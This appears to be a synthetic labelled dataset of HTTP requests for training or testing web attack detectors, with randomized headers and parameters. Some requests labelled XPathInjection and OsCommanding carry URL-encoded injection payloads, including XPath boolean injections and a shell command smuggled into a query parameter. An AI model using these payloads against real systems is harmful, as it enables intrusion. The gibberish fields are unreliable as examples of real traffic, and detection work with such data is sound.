If-Modified-Since: Tue, 27 Jul 04 03:36:56 GMT
If-Unmodified-Since: Fri, 06 Nov 09 18:59:22 CET
If-Match: *
If-None-Match: "tG_FF.Vbh0_K-UJX"
If-Range: Wed, 21 Jan 09 22:14:46 UTC
Max-Forwards: 1
MIME-Version: 2.2
Pragma: no-cache
Proxy-Authorization: Digest opaque="ia4zuj"
Authorization: Digest uri=http://eI1oyl3r.net/tiehotb/hkua.jsp
Range: 711-
Referer: http://www.ecfrDfa.com/lstoowfu.gif
TE: deflate;q=0.1
Trailer: Upgrade
User-Agent: Mozilla/1.8 (Machintosh; U; Mac OS X 0.2; aT-t5; rv:4.6.8) Gecko/09019430
UA-CPU: 68000
UA-Disp: 0223,7526,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 1178x5140
Via: HTTP/1.3 www.6meeniae.js:105
Transfer-Encoding: gzip
Upgrade: ltbi/4.7, tales/0.8, zhnie/8.7, osts/9.3, yne/5.8
Warning: 883 www.uoctiy9.gif "iy8rsanss" "Tue, 08 Apr 08 02:11:02 CET"
X-Forwarded-For: 172.76.114.81
X-Serial-Number: 3067055271
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

eanesr=neo&nncNkt7ctadef=cKvosthmd>nr&et&rgk6=a8K4p4&5weisc=p(&t5oao0Hetud=ehiesleopennupdate&ab=las?p1e&6Awxyousoon=cOH@53LTgAA&hLxrfe3e2e=N|wIBOpassthrubxItnoTe?lxterma&lrnsAao7hx=and  0<>(select   count(*)     from   ia6 where    sEEpfE<>)&trsKcsdens1ren6=kUkHg&ttShetioBeepsE=4177794

End - Id: 41397
Start - Id: 33836
class: Valid
PUT /oianopexteyOysneeie/optt2VftpdocumentDX.jpeg? HTTP/1.1
Content-Length: 118
Content-Language: zW,oaig7o7n
Content-Encoding: deflate
Content-Location: http://www.2eyt.de/irfe/tesaHdi.asp
Content-MD5: YXJzNUVleng0YW5oYXRuNg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 13 Jan 04 05:09:24 GMT
Last-Modified: Thu, 27 Jan 05 08:20:29 UTC
Host: 82.6.226.86
Connection: yA1xe
Accept: video/quicktime, audio/x-wav
Accept-Charset: *
Accept-Encoding: identity;q=0.3, gzip, deflate;q=0.8
Accept-Language: *;q=0.4
Cache-Control: min-fresh=34308
Client-ip: 39.102.236.219
Cookie: ezawl1eE=t;atstzths=n+sz;YcewtctA0gets=710090762;l8=kgoot;ku5metbox=1366396;ondbaoismOe=it o\|ijt5e/
Cookie2: $Version="44"
Date: Fri, 24 Sep 04 06:52:28 CET
ETag: W/"vbi4UElURFMGaFMz9b"
Expect: iehm=aTim;nWwnjnIN
From: 7anyexre@tsetohtps.cz
If-Modified-Since: Thu, 17 Apr 08 19:25:46 UTC
If-Unmodified-Since: Sun, 11 Mar 07 14:28:27 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 07 Apr 07 14:22:35 GMT
Max-Forwards: 9369
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: lecc hubuhe=ose0hecb
Authorization: l6hcf sezh=t7phy
Range: -623
Referer: /8l0nt/t6Es/t1ZeiuRi/1eeT.php4
TE: chunked;q=0.5,trailers
Trailer: Via
User-Agent: Mozilla/8.9 (Machintosh; U; Mac OS X 0.9; sn-jc; rv:9.0.2) Gecko/66815299
UA-CPU: Sparc
UA-Disp: 2081,476,8
UA-OS: Win95
UA-Color: color32
UA-Pixels: 4860x424
Via: 5.5 55.148.90.31
Transfer-Encoding: gzip
Upgrade: n2n/0.6, r9tht/7.3, gTcc/2.6, siadv/0.2
Warning: 049 www.oEI89of.png "InsghqcrnEttcefno" "Sat, 06 Mar 04 07:11:19 UTC"
X-Forwarded-For: 54.10.214.243
X-Serial-Number: 055596224296619509
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

4rimgs8Pj=winnttr8droplibuleEpsb&9aqHmlewm5=040&HTQbwe=9772795&BPjV_G=88506418&niryeksaent=qaiuG&rooisvuGaseets=rtasor

End - Id: 33836
Start - Id: 21100
class: Valid
GET /eJgtnrstn79o/ert3r7elgsinMr/rirayehtatrrtwoI/8Qn.html? HTTP/1.1
Host: 198.99.144.168
Connection: 6oena
Accept: video/quicktime;q=0.8, image/gif;q=0.3, text/*
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: b2e-g75, SboCwmin-e8TEr;q=0.4
Cache-Control: no-store
Client-ip: 41.159.222.224
Cookie: f2scNodttjnrdth=477570;ihnrmi=1;gGLW=A&tmptttc=so;o3nt3s=9526;ei1ehQeetps=A tojm mk@b;sndhriijtwoce=s1X
Cookie2: $Version="4"
Date: Mon, 28 Feb 05 22:25:29 CET
ETag: W/"ftGWEArrI0_-kyK"
Expect: 100-continue
From: esr8neue@emIt.biz
If-Modified-Since: Mon, 20 Aug 07 10:37:00 CET
If-Unmodified-Since: Thu, 07 Sep 06 01:29:48 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 15 Sep 09 21:10:10 CET
Max-Forwards: 9356
MIME-Version: 9.2
Pragma: no-cache
Proxy-Authorization: nath o2h1E=5lEosz
Authorization: Basic T2UxczpIT2tlMw==
Range: 72-,4-191
Referer: /Otchartm/nREr0t/0rth/kNerelu.bin
TE: chunked;q=0.4,deflate
Trailer: If-Range
User-Agent: rfae/5.6.4
UA-CPU: x86
UA-Disp: 595,813,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 969x1839
Via: 8.5 56.51.254.48
Transfer-Encoding: identity
Upgrade: nwr/6.8, eak/9.5, 9dej/0.9, urA/5.8, ecpeiw/5.4
Warning: 013 32.109.56.115 "pnfua3r" "Tue, 13 Jun 06 23:41:16 CET"
X-Forwarded-For: 133.50.37.166
X-Serial-Number: 62118973546819667200
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 21100
Start - Id: 34063
class: Valid
PUT /tFVgg5gcM3u5-/Coai07F1Y/wSJAz/ateiy/u6G.HArmLLoBOYJ.2i/pssz/lAenuutbdo2/zbodyeoNQ/4acyTgimeayui/7coAytctim.nsf? HTTP/1.1
Content-Length: 71
Content-Language: u4txydLt,wgpixds,i2e
Content-Encoding: gzip
Content-Location: http://www.oo7anna.org/tmrny/y8hdccst/Ewsea/hu8cagio.swf
Content-MD5: SGlFbGVvZ3NhcmhPbWRzdA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 06 Sep 07 21:52:52 GMT
Last-Modified: Sun, 24 Oct 04 22:13:02 CET
Host: www.iourdn.com
Connection: close
Accept: video/mpeg;q=0.0, application/*
Accept-Charset: koi8-r, x-mac-turkish
Accept-Encoding: identity;q=0.5
Accept-Language: Rrwo-oPnhedlo;q=0.8
Cache-Control: min-fresh=76119
Client-ip: 149.70.56.252
Cookie: Ettdnotaantnveg=8262;daoUe=rf3kewemCc
Cookie2: $Version="527"
Date: Fri, 07 Oct 05 13:26:18 UTC
ETag: W/"vVJSwSv7ZG9Bv3-"
Expect: 100-continue
From: eshil@tpeiae1n.fr
If-Modified-Since: Mon, 08 Nov 04 17:13:25 GMT
If-Unmodified-Since: Tue, 15 Jun 04 06:33:18 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 20 Mar 10 05:59:54 UTC
Max-Forwards: 00
MIME-Version: 5.6
Pragma: b=hItther
Proxy-Authorization: Digest algorithm=3ugedca2
Authorization: ecps sNate=hinE8Ri
Range: 570-71585,-07733,24816-16
Referer: /Qii3ce/vrmtsan/soei2iut/a2oRe.swf
TE: deflate,trailers,chunked
Trailer: TE
User-Agent: no5i5ReLt/3.0.7
UA-CPU: x86
UA-Disp: 2533,0787,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 682x2942
Via: HTTP/8.0 61.39.29.23
Transfer-Encoding: compress
Upgrade: qhe6/5.5, Ndaod/1.6, zcbn/9.5, tweeah/0.8, v9imgh/0.4
Warning: 839 136.145.234.240:03 "8eru4Saovlliuyd" 
X-Forwarded-For: 217.182.237.209
X-Serial-Number: 096002850
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

ttknslrwutg=er0x&68ausfte3rl=538386&k4ch7=prwgetadmindoY&\%fhttps

End - Id: 34063
Start - Id: 30805
class: Valid
GET /hACdF4LuxlSC7/pt4nltFnhpoEs1ahwi/PUlPolswcllib1U7/a2P7AjP3HJdhmRc2UkJ.pl?teoet=9oms9phtsR&HKRcmdPWbYYl=ax0oUHsmx&u1i8=nyta&SAPqTdc-z=7aE&t7Enph-i3Zen1execbetween=7962908118&ngrsth0aNonapp=l&cLYovtmm9ttn=ll5-&FzXFQarRtdfk=3760293&NesnLhsi=82195340&eq0yl6t=i&cYSs=iaTdbs6jn6&o2hustqzmce2v=3mbzycE%3C0aym2alasn&RgNj9LWbLLL=d6DQs&sesuovt5n=rtit%2F HTTP/1.1
Host: 122.251.152.132:80
Connection: medieAr
Accept: text/xml, text/*, image/png
Accept-Charset: x-mac-greek;q=0.9, iso-10646-ucs-2
Accept-Encoding: deflate;q=0.5, gzip;q=0.1, gzip, compress;q=0.8, compress
Accept-Language: stqdefs-Dsa8;q=0.2, tbPfJmue-eCatalm, y3wwd-ao, inenr-HtotHc;q=0.7
Cache-Control: t='slu1'
Client-ip: 134.178.65.51
Cookie: eoTyzEe=yxr4~;logL2Pc8s=HbdHp3f1betnetsb;sBselcEa=cUw6pmcn6wrxro
Cookie2: $Version="156"
Date: Tue, 20 Dec 05 09:37:59 GMT
ETag: "sU5AkRRl-QKdVUWT"
Expect: Ntiuo5t
From: eauh@chhrgB5dy.biz
If-Modified-Since: Thu, 14 Apr 05 18:51:02 UTC
If-Unmodified-Since: Mon, 29 Jan 07 01:58:59 GMT
If-Match: *
If-None-Match: *
If-Range: "NUu.CbdcflB9H_K"
Max-Forwards: 981
MIME-Version: 6.9
Pragma: pnih='ahser'
Proxy-Authorization: Digest username="pasoit"
Authorization: Basic Z2xydTpyY3RhaXpiZA==
Range: 40-,5809-053,-843
Referer: http://esHes.be/wnuhae/ahOaefnT/ehegr8s/l8rnt/N0TsyAn.css
TE: trailers,trailers
Trailer: Pragma
User-Agent: Mozilla/5.7 (Windows; U; Win98 0.1; sl-oo; rv:6.1.9) Gecko/62786338
UA-CPU: PowerPC
UA-Disp: 384,8584,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 450x916
Via: FTP/4.6 www.tuuse9n.jpeg, oor/3.4 www.Edsstn.js, FTP/3.1 www.etdlyofw.jpeg
Transfer-Encoding: nsz2; wrsw0Z=ibc8
Upgrade: ihtDn/4.6, eN2ena/8.7, ppdra/5.2, Dstur/4.4
Warning: 732 112.144.58.134 "HhNnuq" 
X-Forwarded-For: 226.201.113.37
X-Serial-Number: 277433290484890410
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 30805
Start - Id: 4547
class: Valid
PUT /reisabsboTiZ/-Moa7nupdate9J-rVc/eetEzAJmXNBXrI/ctazMjr6ian8yNgpc/ne/iGM/uwp-d3PuinputT1P/muwp-cZQ1IX.php? HTTP/1.0
Content-Length: 241
Content-Language: hArept
Content-Encoding: gzip
Content-Location: http://www.tonf.com/Eatso7t.nsf
Content-MD5: MTNvYTJudGhpaWN0YXVteg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 05 Sep 04 19:10:18 CET
Last-Modified: Tue, 09 Jan 07 19:30:55 CET
Host: www.wTnb.cz
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 131.137.11.104
Cookie: dfr=o@idj1cnh%5y~sbiahe ;a7Cs=@Lhome)
Cookie2: $Version="48"
Date: Tue, 22 Nov 05 10:16:47 UTC
ETag: W/"Sbdxh-Z.7yodqrahW9"
Expect: 100-continue
From: rsnydvh6@sezlefn.be
If-Modified-Since: Wed, 08 Jul 09 19:36:57 UTC
If-Unmodified-Since: Fri, 13 Jan 06 08:44:14 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 3786
MIME-Version: 1.4
Pragma: no-cache
Proxy-Authorization: siAwto Meexad=tnbnonc
Authorization: Digest nc=CA1e9F6D
Range: -574,-888
Referer: /ems7e/77ii/OtethM/meea8p.pdf
TE: trailers
Trailer: Host
User-Agent: 6QKXiO http://www.snosCisL.ch
UA-CPU: Sparc
UA-Disp: 453,6755,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 3467x636
Via: 4.3 78.171.212.142, HTTP/2.7 www.olHtn.html:75
Transfer-Encoding: l4yy; e7Hnh=Tos8
Upgrade: 5oSf/8.1, asfrl/0.4, ageuy/4.8
Warning: 831 23.54.115.116 "diole" 
X-Forwarded-For: 165.72.96.126
X-Serial-Number: 20953212720530098
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

oG1y=netcatszxzhttpw&ovlyem2msl=eo|stdinne\At&hUtnsa=ziiacmde&rdsds=oari&otcirdsdgCd=7Haoi_xoUE0&te=? Scxhpeabo ns\tPtlm&ARg1acceptEj=604131&c5=6tqDRs: dXeGdcatiframeaajrt&xAPHs-6uG=42536580&OY4dropbarM=wtteiteaSnqf5&waetiearx=rAi7

End - Id: 4547
Start - Id: 49562
class: XPathInjection
GET /fssRlhyaNttpbo/ang.sh?NtWiEirrlHoces=z&upCa=%25wten&imreaen6t=l%25&ammhecuespc=48669&y0cgiardemtl=sese&tQo0rlnhsf0=oR-uG3&yoyei=9ceI&oed4b=Uaow1a5muasrmBestyle&ckLlv7=eoxeggNb5hmoe&60raa8igarfr=3&tCrxt=tnorcuOarels&ehuAzincx=oo&eo7f=hHrGn0a%27+++++or++6+%3C+count%28path%2Fchild%3A%3A*%29++or+%27dysauuM%27++++%3D+%27&Sewm=47254&1mdbennii=gZLohl6%40 HTTP/1.0
Host: 3.193.125.165:80
Connection: close
Accept: image/png, text/*;q=0.3
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: min-fresh=84688
Client-ip: 69.118.218.13
Cookie: jem6di00wu4=08999;dtarkntw5=2oaiacmdrr
Cookie2: $Version="09"
Date: Wed, 13 Aug 08 24:57:53 UTC
ETag: W/"DuBPCDfsenyCYtucp4"
Expect: 100-continue
From: swnuaoul@meaPt.org
If-Modified-Since: Mon, 19 Sep 05 17:29:16 UTC
If-Unmodified-Since: Wed, 19 Jan 05 07:41:43 CET
If-Match: "gSfVBjMCwIxcO2KBCV"
If-None-Match: *
If-Range: *
Max-Forwards: 17
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: 9a2ilt dswfus7=iredewem
Authorization: NTLM UkFybjRhc3JBNDVhYXhoVWplaUlhYXNvZG90ZHRoZGZoczg=
Range: 8-,588-
Referer: /zo0nttb/eant/leAls/2zrpeh/twgIPpa.avi
TE: gzip,gzip;q=0.6
Trailer: TE
User-Agent: Mozilla/0.4 (X11; U; Open BSD i586 6.1; pr-fh; rv:3.6.9) Gecko/10672038
UA-CPU: Sparc
UA-Disp: 2924,8513,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 9192x115
Via: 8.0 www.fdlOhZh.jpg
Transfer-Encoding: deflate
Upgrade: opGee/0.6, iij/9.1, thIez/8.7
Warning: 622 40.205.215.175:58 "enti0naeoeboeeo" 
X-Forwarded-For: 17.226.135.24
X-Serial-Number: 5637590848505362302
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 49562
Start - Id: 43201
class: OsCommanding
GET /lsSx/TpabwNo.nsf?iaseoeet=1488756751&edcNeeal=7i&tnsuoSyyjoesraD=kAcceNshita&saTtyios=mail+++ta%40cnmhpei9e.saax5.gov++%3C%3C++++%2Ftmp%2Fwu.c++%3B&cptAoeAlal=84&bxmnsc=dexbh0xhefhenssy HTTP/1.1
Host: www.chupnGcS.be:80
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: IoirlI-se, 3mkw-mpqc;q=0.1, erirRme-s95Dtonp;q=0.6
Cache-Control: max-stale=284
Client-ip: 79.214.12.199
Cookie: xeetpptfrikma=442;ganoobosn=updateWe6lntan;C5wccatnn=oy_
Cookie2: $Version="9"
Date: Mon, 15 Sep 08 23:59:47 GMT
ETag: W/"ZrsNZ8DCH0PWd7.VuP.4"
Expect: QStwrm
From: eena@eaooz.de
If-Modified-Since: Wed, 14 May 08 07:45:23 GMT
If-Unmodified-Since: Thu, 05 May 05 24:02:35 GMT
If-Match: "QsbamW6HqGKuYr_wgb"
If-None-Match: "cA4pSYaTcJ3D8d7YyXs"
If-Range: *
Max-Forwards: 4720
MIME-Version: 5.9
Pragma: no-cache
Proxy-Authorization: neeoh eyo1ad=huxteEf
Authorization: NTLM MmJ5d2V0RTJ2bmlzbmFjcmllaWU4ZGVhdGVzQW9vc29zbnNzdHB1ZGg=
Range: 704-945122,63-330705
Referer: /a92dsit/mtgayie/Uurne/eCgtdlan/ieeckdpd.css
TE: trailers,trailers
Trailer: If-Modified-Since
User-Agent: iioc (tf_ed0; dh1Wwq7; iik9K0T6c)
UA-CPU: 68000
UA-Disp: 1503,1276,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 953x846
Via: HTTP/6.1 200.202.172.26:89, 1.6 www.atx6os.html
Transfer-Encoding: gzip
Upgrade: hi11/1.2
Warning: 254 www.o7hkelz.js:8351 "etdelrar1" 
X-Forwarded-For: 36.142.205.114
X-Serial-Number: 3512760212193
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43201
Start - Id: 4660
class: Valid
PUT /Rs9erttiHuin/x1k2Ryw8u/8C0Y/nuob/2G0dropHZxmlOT5nodet3pd/Thaving/KsuAWH/n6nrpraoi/944Z@jVWiz0TTtWq281.php? HTTP/1.1
Content-Length: 221
Content-Language: Eeote7b,r3ol,eoldgk
Content-Encoding: gzip
Content-Location: /oaaeo/e9lc/Lcil.jsp
Content-MD5: cWRlc2xzc3VldHVvZXRpZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 26 Jan 09 10:16:13 GMT
Last-Modified: Thu, 04 Jan 07 16:52:10 GMT
Host: www.shrhks.it
Connection: close
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: h-ohAlei, eme-70ei, Auh7am-otncxq1t;q=0.3, n1asT-ueg, soimalqi-t;q=0.0
Cache-Control: max-age=29396
Client-ip: 123.212.61.1
Cookie: uoiAr=ovim;0srtel=ih6iieohpm%cd;echoqvbscriptlw.M=cVOfM;autoexecPOzK4=iusrisl=nmu55;meh2ldeserhos=80045;ea5Nne=1307
Cookie2: $Version="9"
Date: Wed, 15 Nov 06 20:38:42 CET
ETag: W/"EQs8YPR4bXGJqL8"
Expect: 100-continue
From: e8Lt@yeTis8dS8t.st
If-Modified-Since: Fri, 19 Jan 07 16:02:12 GMT
If-Unmodified-Since: Thu, 19 Mar 09 15:28:11 CET
If-Match: *
If-None-Match: *
If-Range: Mon, 25 Dec 06 16:31:49 CET
Max-Forwards: 5393
MIME-Version: 2.8
Pragma: kbSur='e'
Proxy-Authorization: lTtiyo nvr3av=9tjvahtk
Authorization: Basic Zzh1YnpzdDo5b25H
Range: -5,386883-,153-
Referer: http://www.slndosa7.biz/yeiotE/luQe7qyt.swf
TE: chunked,gzip,deflate;q=0.1
Trailer: Host
User-Agent: aU70E2TP2N http://www.utlavhn.ch
UA-CPU: 68000
UA-Disp: 0704,6679,32
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 0964x700
Via: HTTP/0.0 www.676iae.js, Tvehhd/2.9 230.37.53.111, HTTP/1.2 179.81.244.114
Transfer-Encoding: identity
Upgrade: 4fZfWy/9.8, wdrsia/5.8, 9ie/8.3
Warning: 496 www.niTE.jpeg "d7swtamz" "Thu, 24 Mar 05 12:21:16 UTC"
X-Forwarded-For: 71.251.211.91
X-Serial-Number: 42430609467360464
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~

tpreos=sf0a&7htcgttl=t)>;&xmlvewlzxwhereoW3=unZ@98&ew=6002&ispirae=08&z0tngqRorhegmx=556248105&w@hIUnc.C9Aservices= ksmtjtmpyaniu/yat&yos=ebnthjqrat5ietpj&oEan=nulltetmp> o~e\klrknashutdowniperlr&et5d=tupd

End - Id: 4660
Start - Id: 49079
class: XPathInjection
GET /oGyDp0yBU8qAqbJithj/NL6QiHM5/w6O17Gy7foJf3_D/6erucociatltaeeoi/DtiIcrgresrthozdwdsE/rb1twf3ht/aZloNdd53R.msf?aeorDcLh=rLri%27+or++++1%3C++++dlPek0%2Fewync8%2Fe%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D50%5D+++or+++++%27pico4u%27%3D++%27&itooeT=dtf&eOayaioimnesam=o9jta466nY&j6dhwederhb=zSeR5a7til43&0uog6=270&s4meoilee=39901&DsAf0Ff=ertSnjion4fl&Egfn=t%25%25grr0%2FEh&etm=UyY%5C%40ent&XQUM=i7sjgH&aeame8ierT=437 HTTP/1.1
Host: 123.84.53.19
Connection: keep-alive
Accept: video/quicktime
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: *
Cache-Control: max-stale=150
Client-ip: 22.250.1.169
Cookie: nsystemZab=nR5y
Cookie2: $Version="155"
Date: Sun, 22 May 05 12:27:07 GMT
ETag: W/"J5ZrTZFKYipwFlmzpF"
Expect: 100-continue
From: iovise@dAaalkEsu9.ch
If-Modified-Since: Sat, 27 May 06 03:47:10 CET
If-Unmodified-Since: Sat, 12 Dec 09 10:34:46 GMT
If-Match: "JjE1W-5YpcKz_Bq"
If-None-Match: *
If-Range: *
Max-Forwards: 24
MIME-Version: 5.6
Pragma: ny='I4sjtss'
Proxy-Authorization: Digest username="tlens"
Authorization: Digest nonce
Range: -39415,-80233
Referer: http://www.ebua.st/Hatx/err4Ihs/har2wot.gif
TE: trailers,trailers
Trailer: Date
User-Agent: Mozilla/1.0 (Machintosh; U; Mac OS X 6.3; bq-re; rv:6.9.0) Gecko/87329993
UA-CPU: x86
UA-Disp: 3801,296,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 7313x7197
Via: FTP/0.0 2.1.152.82
Transfer-Encoding: Toew6; Plses=de4ad
Upgrade: ne0d/6.8, b5on/7.9, gcX8/0.6, bci/5.8, ibw/8.8
Warning: 069 www.eoApA.tiff "paahksminehn7lr6TE" "Wed, 28 Oct 09 15:16:56 CET"
X-Forwarded-For: 6.45.41.193
X-Serial-Number: 7433292
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 49079
Start - Id: 26016
class: Valid
GET /oYP0c@r1FaYFC5nx/9sdDWm0onEkAfp6Ng/aYBbkaB_M1HA/EX_5UUomlinkXZj/t2T_jE0u0tUz8NS9/OB/okIUr/m1O2lvNFEYABL9/m@Nae9fKoa9iKykhB/eHONmaD9dWLMNzyd/1jtwhosc0aVhsocetpro.mspx?gftp2xG=eolcxoocnoha&cptt3nehuai6ifm=htaccesaea&netcatzTguq-Z=457440&ASamttbhvoad=ya&varW.BincludeGbetweenaz000=Wl&rea=8436242&etteoxefld=Ueioopon&rpwsaeSitctu=58&Tt9LyeicqtNto8=tB2pxP&rprtnusiesto8n=sd1%29&tisotyp=+re+2&LmqczeoPoEjhhcm=mOuA23x%409P48 HTTP/1.1
Host: www.omP1ueitss.st
Connection: close
Accept: */*;q=0.6
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.6
Accept-Language: a-hriyOe;q=0.9, oaaeyn-rt, sm-uocaao7;q=0.1, p6-mh, uErnauie-inpekin;q=0.3
Cache-Control: no-cache
Client-ip: 254.230.111.50
Cookie: Zw9k=tlKahhIrbsu;ilhysrqochs=154817;ea5=tlnlp;Yal8=9Eid]ehS;Intfwm9tVanani=@ncl
Cookie2: $Version="46"
Date: Sat, 12 Jan 08 07:15:11 CET
ETag: W/"2Z@8jn@K098vvdP_8cU"
Expect: 100-continue
From: rerwoEN@echst.gov
If-Modified-Since: Sun, 04 Jun 06 07:09:06 GMT
If-Unmodified-Since: Sat, 18 Sep 04 09:41:28 CET
If-Match: "BbVfXd8j7cGE@3Cmdo"
If-None-Match: *
If-Range: Fri, 28 Dec 07 02:27:45 GMT
Max-Forwards: 369
MIME-Version: 9.6
Pragma: no-cache
Proxy-Authorization: Basic dHVhZHg6aEhFenJuZA==
Authorization: ha9a9 sng2=r8fS
Range: 93614-
Referer: http://p2ne4ese.be/pirii/lnTynr/mllnexee/Rmwcoh/i1de.cgi
TE: trailers,deflate;q=0.2,deflate
Trailer: Host
User-Agent: Mozilla/2.4 (Windows; U; Win98 0.8; sw-mn; rv:3.5.1) Gecko/16401150
UA-CPU: x86
UA-Disp: 4002,120,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 8535x949
Via: 6.7 www.otzas.js:9370, 7.0 212.178.216.143, 4.1 www.aaefa.css
Transfer-Encoding: identity
Upgrade: yuk/5.7, RisS/8.9
Warning: 578 216.112.216.157 "mtdt" "Thu, 22 Apr 10 15:51:14 GMT"
X-Forwarded-For: 203.134.237.5
X-Serial-Number: 2136376568868794089
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26016
Start - Id: 1852
class: Valid
GET /p03.OSalB9U/h8Ks/ttdTaatt/ywta1urn/mkmEaD8.L/rP6rtiiiA4ken2.aspx?Qannrrd=48&eg03detrm=66759601&esERT6iutbMsnOx=wgetee&eeetmwhcpxur=8955975&rodhlrc=bafegroup+byT+b%3D%7Cg&iespNNh76s2=r77daehburzeg&naa1elentnP7An=s3eiphp&64eioars=yM6&0l=25756 HTTP/1.1
Host: www.rennt6lel.org
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: x-mac-turkish;q=0.1
Accept-Encoding: compress;q=0.5, gzip;q=0.7
Accept-Language: *;q=0.2
Cache-Control: min-fresh=2474
Client-ip: 22.189.233.176
Cookie: bbrasw1=1;Q1y2updateJEd7P=lQc0fs@ZcFOI;ena7enc=94630664;ye4=9798;ori=629108
Cookie2: $Version="513"
Date: Tue, 13 Nov 07 20:28:52 GMT
ETag: "@PZ9hT2@mrfZ-kcWb"
Expect: 100-continue
From: nentele8@rc6nelreEt.be
If-Modified-Since: Wed, 20 Jul 05 09:31:20 GMT
If-Unmodified-Since: Sun, 28 Oct 07 03:04:14 UTC
If-Match: "6mBYZSbjCV7uw@K-"
If-None-Match: "Vt@iEtRZKQKr2Xn"
If-Range: Tue, 28 Nov 06 11:22:04 UTC
Max-Forwards: 373
MIME-Version: 9.5
Pragma: ein6ks1d='lteTri'
Proxy-Authorization: NTLM aHV0blRvZXBhRXVxZmw0Z3MxUGVodG82Z3lldnRlb2FvY3MxOGlnbG9nbQ==
Authorization: inia sSwbna=8LNs
Range: -34624,61390-055,75119-
Referer: /iiedsohn/sntcy/tsr0ptsh/casmS/h7rod.pl
TE: chunked,trailers,trailers
Trailer: Range
User-Agent: fitmcmet/0.9.3
UA-CPU: Sparc
UA-Disp: 868,0811,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 063x9656
Via: FTP/4.3 www.eeItha1.jpeg, 5.0 www.lumxirHU.js:02, 5.9 www.fd8oS8l.jpeg
Transfer-Encoding: identity
Upgrade: eeeDo/9.0
Warning: 891 118.182.25.94 "epdstea40lccSt7xiAtm" "Tue, 07 Sep 04 24:57:56 UTC"
X-Forwarded-For: 62.33.15.123
X-Serial-Number: 64954855399337418
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1852
Start - Id: 8579
class: Valid
GET /e7a0nW7muVfp7l3-xKT/5L2p.php3?at=aEreri&eon6linwr6=optn%3Ea%5B&sihnetcduts5e4=754&tHirsoitDjtaide=zkQkCged&ZpXeTRXsbinuwE=i0e2eAkeels7&ud=8lx-1omx6Vd&7tpet6yejhd6io=9lrkJ36welqnta&53idq7htentbkt=2&tc=nhbNtsla&AlRlisbyurjOhtt=8307&erOaftezer=srDrq1%3C2rautoexec%3Eo HTTP/1.1
Host: www.oislipS.cz:2
Connection: close
Accept: audio/*, application/*;q=0.7, application/rtf;q=0.7
Accept-Charset: *;q=0.6
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.3
Cache-Control: only-if-cached
Client-ip: 254.55.55.39
Cookie: lRXMv5gf=u a;EE_@1FTopen=ok?hho]r  @wlikewsoupdateunion+l;ndi8=55558
Cookie2: $Version="69"
Date: Tue, 10 Mar 09 21:01:09 CET
ETag: "gfuWVs.92eY_wOm"
Expect: iIeea=hhls;evsai
From: ebpee@y0et.gov
If-Modified-Since: Sat, 31 Dec 05 19:38:44 CET
If-Unmodified-Since: Fri, 29 Jul 05 14:25:15 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 05 Apr 06 05:15:38 GMT
Max-Forwards: 571
MIME-Version: 2.6
Pragma: di=u
Proxy-Authorization: NTLM RWUxYWVxcnJzaWt3ZWxzZHVpZW1kZXJzaW00bWZyenNpcmxpbWVpOWY2Ug==
Authorization: ijrl Setsp3ed=exeO5bti
Range: -281,776-17139
Referer: http://www.r41hionh.de/Fm9kcti/oqsnel76/TNfdpt.cgi
TE: trailers,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/3.8 (compatible; Konqueror/1.9; Open BSD i386; otMasrcME; ctyllhhnh)
UA-CPU: Sparc
UA-Disp: 5974,9277,32
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 783x6311
Via: 1.4 www.rdoeaew.htm, HTTP/9.3 27.221.106.19
Transfer-Encoding: deflate
